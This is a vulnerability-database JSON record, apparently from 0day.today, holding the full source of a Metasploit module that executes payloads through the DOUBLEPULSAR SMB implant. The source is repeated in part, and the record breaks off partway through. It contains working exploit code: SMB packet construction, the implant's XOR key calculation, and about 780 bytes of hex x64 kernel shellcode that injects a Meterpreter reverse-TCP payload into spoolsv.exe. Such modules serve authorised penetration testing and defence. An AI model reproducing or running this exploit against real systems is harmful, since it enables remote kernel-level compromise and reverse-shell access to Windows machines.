do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:25:08", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "3c6f25e14a8e784437671b108ca54b11", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-15T22:16:39", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:16:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-15T22:16:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = 